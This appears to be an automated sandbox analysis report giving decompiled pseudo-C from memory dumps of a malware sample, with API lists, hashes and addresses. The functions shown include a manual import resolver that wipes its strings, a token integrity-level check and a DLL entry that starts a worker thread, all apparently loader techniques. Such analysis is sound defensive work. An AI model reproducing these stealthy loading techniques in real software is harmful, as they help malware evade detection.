                                                                                                                                                                                                                                                            				_t27 = __edx;
                                                                                                                                                                                                                                                            				_t12 =  &_v12;
                                                                                                                                                                                                                                                            				GetSystemTimeAsFileTime(_t12);
                                                                                                                                                                                                                                                            				_push(0x192);
                                                                                                                                                                                                                                                            				_push(0x54d38000);
                                                                                                                                                                                                                                                            				_push(_v8);
                                                                                                                                                                                                                                                            				_push(_v12);
                                                                                                                                                                                                                                                            				L0487B072();
                                                                                                                                                                                                                                                            				_push(_t12);
                                                                                                                                                                                                                                                            				_v12 = _t12;
                                                                                                                                                                                                                                                            				_t13 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            				_t5 = _t13 + 0x487e862; // 0x5258e0a
                                                                                                                                                                                                                                                            				_t6 = _t13 + 0x487e59c; // 0x530025
                                                                                                                                                                                                                                                            				_push(0x16);
                                                                                                                                                                                                                                                            				_push( &_v56);
                                                                                                                                                                                                                                                            				_v8 = _t27;
                                                                                                                                                                                                                                                            				L0487AD0A();
                                                                                                                                                                                                                                                            				_t17 = CreateFileMappingW(0xffffffff, 0x487d2a8, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                                                                                                                                            				_t30 = _t17;
                                                                                                                                                                                                                                                            				if(_t30 == 0) {
                                                                                                                                                                                                                                                            					_t28 = GetLastError();
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					if(GetLastError() == 0xb7) {
                                                                                                                                                                                                                                                            						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                                            						if(_t21 == 0) {
                                                                                                                                                                                                                                                            							_t28 = GetLastError();
                                                                                                                                                                                                                                                            							if(_t28 != 0) {
                                                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							 *_a4 = _t30;
                                                                                                                                                                                                                                                            							 *_a8 = _t21;
                                                                                                                                                                                                                                                            							_t28 = 0;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t28 = 2;
                                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                                            						CloseHandle(_t30);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t28;
                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                            0x04877f89
                                                                                                                                                                                                                                                            0x04877f91
                                                                                                                                                                                                                                                            0x04877f95
                                                                                                                                                                                                                                                            0x04877f9b
                                                                                                                                                                                                                                                            0x04877fa0
                                                                                                                                                                                                                                                            0x04877fa5
                                                                                                                                                                                                                                                            0x04877fa8
                                                                                                                                                                                                                                                            0x04877fab
                                                                                                                                                                                                                                                            0x04877fb0
                                                                                                                                                                                                                                                            0x04877fb1
                                                                                                                                                                                                                                                            0x04877fb4
                                                                                                                                                                                                                                                            0x04877fb9
                                                                                                                                                                                                                                                            0x04877fc0
                                                                                                                                                                                                                                                            0x04877fca
                                                                                                                                                                                                                                                            0x04877fcc
                                                                                                                                                                                                                                                            0x04877fcd
                                                                                                                                                                                                                                                            0x04877fd0
                                                                                                                                                                                                                                                            0x04877fec
                                                                                                                                                                                                                                                            0x04877ff2
                                                                                                                                                                                                                                                            0x04877ff6
                                                                                                                                                                                                                                                            0x04878044
                                                                                                                                                                                                                                                            0x04877ff8
                                                                                                                                                                                                                                                            0x04878005
                                                                                                                                                                                                                                                            0x04878015
                                                                                                                                                                                                                                                            0x0487801d
                                                                                                                                                                                                                                                            0x0487802f
                                                                                                                                                                                                                                                            0x04878033
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487801f
                                                                                                                                                                                                                                                            0x04878022
                                                                                                                                                                                                                                                            0x04878027
                                                                                                                                                                                                                                                            0x04878029
                                                                                                                                                                                                                                                            0x04878029
                                                                                                                                                                                                                                                            0x04878007
                                                                                                                                                                                                                                                            0x04878009
                                                                                                                                                                                                                                                            0x04878035
                                                                                                                                                                                                                                                            0x04878036
                                                                                                                                                                                                                                                            0x04878036
                                                                                                                                                                                                                                                            0x04878005
                                                                                                                                                                                                                                                            0x0487804b

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,048790A5,?,?,4D283A53,?,?), ref: 04877F95
                                                                                                                                                                                                                                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04877FAB
                                                                                                                                                                                                                                                            • _snwprintf.NTDLL ref: 04877FD0
                                                                                                                                                                                                                                                            • CreateFileMappingW.KERNELBASE(000000FF,0487D2A8,00000004,00000000,00001000,?), ref: 04877FEC
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,048790A5,?,?,4D283A53), ref: 04877FFE
                                                                                                                                                                                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04878015
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,048790A5,?,?), ref: 04878036
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,048790A5,?,?,4D283A53), ref: 0487803E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1814172918-0
                                                                                                                                                                                                                                                            • Opcode ID: c7e02fcd0433cff8f710e37efc21fe00df118289cbeea63b0581ccad8444f106
                                                                                                                                                                                                                                                            • Instruction ID: 8b9a3be99d5071115a735579fc7d8ab7085d8c50ec49ece88d6e5af10f7bea2e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7e02fcd0433cff8f710e37efc21fe00df118289cbeea63b0581ccad8444f106
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E21D5B2640208BBD721BB68DC2DF9E77A9EF48754F104621F615E7280E674E9018BA0
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E004013C6(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                            				signed short _v12;
                                                                                                                                                                                                                                                            				struct HINSTANCE__* _v16;
                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v24;
                                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                                            				intOrPtr _t36;
                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t37;
                                                                                                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                                                                                                            				CHAR* _t44;
                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t45;
                                                                                                                                                                                                                                                            				intOrPtr* _t52;
                                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                                            				signed short _t54;
                                                                                                                                                                                                                                                            				intOrPtr* _t57;
                                                                                                                                                                                                                                                            				signed short _t59;
                                                                                                                                                                                                                                                            				CHAR* _t60;
                                                                                                                                                                                                                                                            				CHAR* _t62;
                                                                                                                                                                                                                                                            				signed short* _t64;
                                                                                                                                                                                                                                                            				void* _t65;
                                                                                                                                                                                                                                                            				signed short _t72;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t34 =  *((intOrPtr*)(_a8 + 0x80));
                                                                                                                                                                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                            				_t52 = _a4;
                                                                                                                                                                                                                                                            				if(_t34 == 0) {
                                                                                                                                                                                                                                                            					L28:
                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t57 = _t34 + _t52;
                                                                                                                                                                                                                                                            				_t36 =  *((intOrPtr*)(_t57 + 0xc));
                                                                                                                                                                                                                                                            				_a4 = _t57;
                                                                                                                                                                                                                                                            				if(_t36 == 0) {
                                                                                                                                                                                                                                                            					L27:
                                                                                                                                                                                                                                                            					goto L28;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                            					_t62 = _t36 + _t52;
                                                                                                                                                                                                                                                            					_t37 = LoadLibraryA(_t62);
                                                                                                                                                                                                                                                            					_v16 = _t37;
                                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                            					memset(_t62, 0, lstrlenA(_t62));
                                                                                                                                                                                                                                                            					_t53 =  *_t57;
                                                                                                                                                                                                                                                            					_t40 =  *((intOrPtr*)(_t57 + 0x10));
                                                                                                                                                                                                                                                            					_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                                            					if(_t53 != 0) {
                                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                                            						_t64 = _t53 + _t52;
                                                                                                                                                                                                                                                            						_t54 =  *_t64;
                                                                                                                                                                                                                                                            						if(_t54 == 0) {
                                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                                            							_t36 =  *((intOrPtr*)(_t57 + 0x20));
                                                                                                                                                                                                                                                            							_t57 = _t57 + 0x14;
                                                                                                                                                                                                                                                            							_a4 = _t57;
                                                                                                                                                                                                                                                            							if(_t36 != 0) {
                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							L26:
                                                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_v20 = _t40 - _t64 + _t52;
                                                                                                                                                                                                                                                            						_t72 = _t54;
                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                            						if(_t72 < 0) {
                                                                                                                                                                                                                                                            							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
                                                                                                                                                                                                                                                            								_t59 = 0;
                                                                                                                                                                                                                                                            								_v12 =  *_t64 & 0x0000ffff;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								_t59 = _t54;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t59 = _t54 + _t52;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t20 = _t59 + 2; // 0x2
                                                                                                                                                                                                                                                            						_t44 = _t20;
                                                                                                                                                                                                                                                            						if(_t59 == 0) {
                                                                                                                                                                                                                                                            							_t44 = _v12 & 0x0000ffff;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t45 = GetProcAddress(_v16, _t44); // executed
                                                                                                                                                                                                                                                            						_v24 = _t45;
                                                                                                                                                                                                                                                            						if(_t45 == 0) {
                                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						if(_t59 != 0) {
                                                                                                                                                                                                                                                            							_t60 = _t59 + 2;
                                                                                                                                                                                                                                                            							memset(_t60, 0, lstrlenA(_t60));
                                                                                                                                                                                                                                                            							_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						 *(_v20 + _t64) = _v24;
                                                                                                                                                                                                                                                            						_t64 =  &(_t64[2]);
                                                                                                                                                                                                                                                            						_t54 =  *_t64;
                                                                                                                                                                                                                                                            						if(_t54 != 0) {
                                                                                                                                                                                                                                                            							goto L8;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							L22:
                                                                                                                                                                                                                                                            							_t57 = _a4;
                                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						L21:
                                                                                                                                                                                                                                                            						_v8 = 0x7f;
                                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t53 = _t40;
                                                                                                                                                                                                                                                            					if(_t40 == 0) {
                                                                                                                                                                                                                                                            						goto L23;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_v8 = 0x7e;
                                                                                                                                                                                                                                                            				goto L26;
                                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                                            0x004013cf
                                                                                                                                                                                                                                                            0x004013d5
                                                                                                                                                                                                                                                            0x004013dc
                                                                                                                                                                                                                                                            0x004013df
                                                                                                                                                                                                                                                            0x004014e0
                                                                                                                                                                                                                                                            0x004014e5
                                                                                                                                                                                                                                                            0x004014e5
                                                                                                                                                                                                                                                            0x004013e6
                                                                                                                                                                                                                                                            0x004013e9
                                                                                                                                                                                                                                                            0x004013ee
                                                                                                                                                                                                                                                            0x004013f1
                                                                                                                                                                                                                                                            0x004014df
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004014df
                                                                                                                                                                                                                                                            0x004013f8
                                                                                                                                                                                                                                                            0x004013f8
                                                                                                                                                                                                                                                            0x004013fc
                                                                                                                                                                                                                                                            0x00401404
                                                                                                                                                                                                                                                            0x00401407
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0040140d
                                                                                                                                                                                                                                                            0x0040141c
                                                                                                                                                                                                                                                            0x00401421
                                                                                                                                                                                                                                                            0x00401423
                                                                                                                                                                                                                                                            0x00401426
                                                                                                                                                                                                                                                            0x0040142b
                                                                                                                                                                                                                                                            0x00401437
                                                                                                                                                                                                                                                            0x00401437
                                                                                                                                                                                                                                                            0x0040143a
                                                                                                                                                                                                                                                            0x0040143e
                                                                                                                                                                                                                                                            0x004014c4
                                                                                                                                                                                                                                                            0x004014c4
                                                                                                                                                                                                                                                            0x004014c7
                                                                                                                                                                                                                                                            0x004014cc
                                                                                                                                                                                                                                                            0x004014cf
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004014de
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004014de
                                                                                                                                                                                                                                                            0x00401448
                                                                                                                                                                                                                                                            0x0040144b
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0040144d
                                                                                                                                                                                                                                                            0x0040144d
                                                                                                                                                                                                                                                            0x00401456
                                                                                                                                                                                                                                                            0x0040146b
                                                                                                                                                                                                                                                            0x0040146d
                                                                                                                                                                                                                                                            0x00401464
                                                                                                                                                                                                                                                            0x00401464
                                                                                                                                                                                                                                                            0x00401464
                                                                                                                                                                                                                                                            0x0040144f
                                                                                                                                                                                                                                                            0x0040144f
                                                                                                                                                                                                                                                            0x0040144f
                                                                                                                                                                                                                                                            0x00401472
                                                                                                                                                                                                                                                            0x00401472
                                                                                                                                                                                                                                                            0x00401475
                                                                                                                                                                                                                                                            0x00401477
                                                                                                                                                                                                                                                            0x00401477
                                                                                                                                                                                                                                                            0x0040147f
                                                                                                                                                                                                                                                            0x00401487
                                                                                                                                                                                                                                                            0x0040148a
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0040148e
                                                                                                                                                                                                                                                            0x00401490
                                                                                                                                                                                                                                                            0x0040149e
                                                                                                                                                                                                                                                            0x004014a3
                                                                                                                                                                                                                                                            0x004014a3
                                                                                                                                                                                                                                                            0x004014ac
                                                                                                                                                                                                                                                            0x004014af
                                                                                                                                                                                                                                                            0x004014b2
                                                                                                                                                                                                                                                            0x004014b6
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004014b8
                                                                                                                                                                                                                                                            0x004014c1
                                                                                                                                                                                                                                                            0x004014c1
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004014c1
                                                                                                                                                                                                                                                            0x004014ba
                                                                                                                                                                                                                                                            0x004014ba
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004014ba
                                                                                                                                                                                                                                                            0x0040142f
                                                                                                                                                                                                                                                            0x00401431
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401431
                                                                                                                                                                                                                                                            0x004014d7
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrlenmemset$AddressLibraryLoadProc
                                                                                                                                                                                                                                                            • String ID: ~
                                                                                                                                                                                                                                                            • API String ID: 1986585659-1707062198
                                                                                                                                                                                                                                                            • Opcode ID: 4b5eecb51c1c3c9d34fab11e04f5d265180c608e87286b14de661ac9a998bcb4
                                                                                                                                                                                                                                                            • Instruction ID: ea6d38953af664197afd9291520ade27d8313670195891471172735f949d29a2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b5eecb51c1c3c9d34fab11e04f5d265180c608e87286b14de661ac9a998bcb4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5315C71A01205ABDB14CF59C980BBEB7B4BF44305F25407AE805FB2A1D738EA05CB59
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E04874803(long* _a4) {
                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                            				void _v16;
                                                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_v16 = 1;
                                                                                                                                                                                                                                                            				_v20 = 0x2000;
                                                                                                                                                                                                                                                            				if( *0x487d25c > 5) {
                                                                                                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                                                                                                            					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                                                                                                                                                            						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                                                            						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                                            						if(_v8 != 0) {
                                                                                                                                                                                                                                                            							_t46 = E048716F8(_v8);
                                                                                                                                                                                                                                                            							if(_t46 != 0) {
                                                                                                                                                                                                                                                            								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                                                                                                                                                            								if(_t33 != 0) {
                                                                                                                                                                                                                                                            									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								E048770FF(_t46);
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						CloseHandle(_v12);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				 *_a4 = _v20;
                                                                                                                                                                                                                                                            				return _v16;
                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                            0x04874810
                                                                                                                                                                                                                                                            0x04874817
                                                                                                                                                                                                                                                            0x0487481e
                                                                                                                                                                                                                                                            0x04874832
                                                                                                                                                                                                                                                            0x0487483d
                                                                                                                                                                                                                                                            0x04874855
                                                                                                                                                                                                                                                            0x04874862
                                                                                                                                                                                                                                                            0x04874865
                                                                                                                                                                                                                                                            0x0487486a
                                                                                                                                                                                                                                                            0x04874875
                                                                                                                                                                                                                                                            0x04874879
                                                                                                                                                                                                                                                            0x04874888
                                                                                                                                                                                                                                                            0x0487488c
                                                                                                                                                                                                                                                            0x048748a8
                                                                                                                                                                                                                                                            0x048748a8
                                                                                                                                                                                                                                                            0x048748ac
                                                                                                                                                                                                                                                            0x048748ac
                                                                                                                                                                                                                                                            0x048748b1
                                                                                                                                                                                                                                                            0x048748b5
                                                                                                                                                                                                                                                            0x048748bb
                                                                                                                                                                                                                                                            0x048748bc
                                                                                                                                                                                                                                                            0x048748c3
                                                                                                                                                                                                                                                            0x048748c9

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04874835
                                                                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04874855
                                                                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04874865
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 048748B5
                                                                                                                                                                                                                                                              • Part of subcall function 048716F8: RtlAllocateHeap.NTDLL(00000000,00000000,0487147D), ref: 04871704
                                                                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04874888
                                                                                                                                                                                                                                                            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04874890
                                                                                                                                                                                                                                                            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 048748A0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1295030180-0
                                                                                                                                                                                                                                                            • Opcode ID: 314cabe3a100378855ebf47e86318ca842bdc7da472d85d5ae6be11787c1eb88
                                                                                                                                                                                                                                                            • Instruction ID: 4a55d3d5be31e02c5cc6ed5c80943bd79866d7e99c36a4118467eeb6bc1aeb71
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 314cabe3a100378855ebf47e86318ca842bdc7da472d85d5ae6be11787c1eb88
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A215C7590024CFFEB00AF94DC98EAEBBB9EF08708F0004A5EA10A6251C7759E05EF60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                                                            			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                                            				long _t9;
                                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                                            				_t9 = _a8;
                                                                                                                                                                                                                                                            				_v8 = 1;
                                                                                                                                                                                                                                                            				if(_t9 == 0) {
                                                                                                                                                                                                                                                            					_t10 = InterlockedDecrement(0x404108);
                                                                                                                                                                                                                                                            					__eflags = _t10;
                                                                                                                                                                                                                                                            					if(_t10 == 0) {
                                                                                                                                                                                                                                                            						__eflags =  *0x40410c;
                                                                                                                                                                                                                                                            						if( *0x40410c != 0) {
                                                                                                                                                                                                                                                            							_t36 = 0x2710;
                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                            								SleepEx(0x64, 1);
                                                                                                                                                                                                                                                            								__eflags =  *0x404118;
                                                                                                                                                                                                                                                            								if( *0x404118 == 0) {
                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								_t36 = _t36 - 0x64;
                                                                                                                                                                                                                                                            								__eflags = _t36;
                                                                                                                                                                                                                                                            								if(_t36 > 0) {
                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							CloseHandle( *0x40410c);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						HeapDestroy( *0x404110);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					if(_t9 == 1 && InterlockedIncrement(0x404108) == 1) {
                                                                                                                                                                                                                                                            						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                                            						_t41 = _t18;
                                                                                                                                                                                                                                                            						 *0x404110 = _t18;
                                                                                                                                                                                                                                                            						if(_t18 == 0) {
                                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                                            							_v8 = 0;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							 *0x404130 = _a4;
                                                                                                                                                                                                                                                            							asm("lock xadd [eax], ebx");
                                                                                                                                                                                                                                                            							_t23 = CreateThread(0, 0, E00401DB8, E004019F2(_a12, 0, 0x404118, _t41), 0,  &_a8); // executed
                                                                                                                                                                                                                                                            							 *0x40410c = _t23;
                                                                                                                                                                                                                                                            							if(_t23 == 0) {
                                                                                                                                                                                                                                                            								asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                                            0x00401ebe
                                                                                                                                                                                                                                                            0x00401eca
                                                                                                                                                                                                                                                            0x00401ecc
                                                                                                                                                                                                                                                            0x00401ecf
                                                                                                                                                                                                                                                            0x00401f49
                                                                                                                                                                                                                                                            0x00401f4f
                                                                                                                                                                                                                                                            0x00401f51
                                                                                                                                                                                                                                                            0x00401f53
                                                                                                                                                                                                                                                            0x00401f59
                                                                                                                                                                                                                                                            0x00401f5b
                                                                                                                                                                                                                                                            0x00401f60
                                                                                                                                                                                                                                                            0x00401f63
                                                                                                                                                                                                                                                            0x00401f6e
                                                                                                                                                                                                                                                            0x00401f70
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401f72
                                                                                                                                                                                                                                                            0x00401f75
                                                                                                                                                                                                                                                            0x00401f77
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401f77
                                                                                                                                                                                                                                                            0x00401f7f
                                                                                                                                                                                                                                                            0x00401f7f
                                                                                                                                                                                                                                                            0x00401f8b
                                                                                                                                                                                                                                                            0x00401f8b
                                                                                                                                                                                                                                                            0x00401ed1
                                                                                                                                                                                                                                                            0x00401ed2
                                                                                                                                                                                                                                                            0x00401ef2
                                                                                                                                                                                                                                                            0x00401ef8
                                                                                                                                                                                                                                                            0x00401efa
                                                                                                                                                                                                                                                            0x00401eff
                                                                                                                                                                                                                                                            0x00401f3f
                                                                                                                                                                                                                                                            0x00401f3f
                                                                                                                                                                                                                                                            0x00401f01
                                                                                                                                                                                                                                                            0x00401f09
                                                                                                                                                                                                                                                            0x00401f10
                                                                                                                                                                                                                                                            0x00401f29
                                                                                                                                                                                                                                                            0x00401f31
                                                                                                                                                                                                                                                            0x00401f36
                                                                                                                                                                                                                                                            0x00401f3b
